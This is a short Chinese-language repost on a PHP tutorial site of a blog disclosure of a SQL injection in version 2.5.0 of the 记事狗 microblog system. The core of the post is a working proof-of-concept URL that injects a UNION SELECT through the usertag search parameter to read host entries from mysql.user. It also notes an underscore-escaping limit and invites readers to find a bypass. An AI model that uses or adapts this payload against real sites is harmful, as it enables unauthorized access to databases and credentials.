来源:自学PHP网 时间:2015-04-17 13:02 作者: 阅读:次
[导读] 无意中发现的,只测试了记事狗微博客系统2.5.0 UTF8 Build 20110130因为系统会将_ 转换为\_ 所以像load_file、有表前缀的都不行,暂时没想到办法去绕过,作为技术挑战吧。测试方法:http://ww...
|
无意中发现的,只测试了“记事狗微博客系统2.5.0 UTF8 Build 20110130”
因为系统会将”_” 转换为”\_” 所以像”load_file”、有表前缀的都不行,暂时没想到办法去绕过,作为技术挑战吧。 测试方法: http://www.2cto.com /index.php?code=usertag&mod=search&usertag=1″/**/and/**/1=2/**/union/**/select/**/1,2,host,4/**/from/**/mysql.user%23 EXP不会造成严重影响,且仅供研究之用 摘自 疯子博客|Madman@SysCiC.TeAm |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
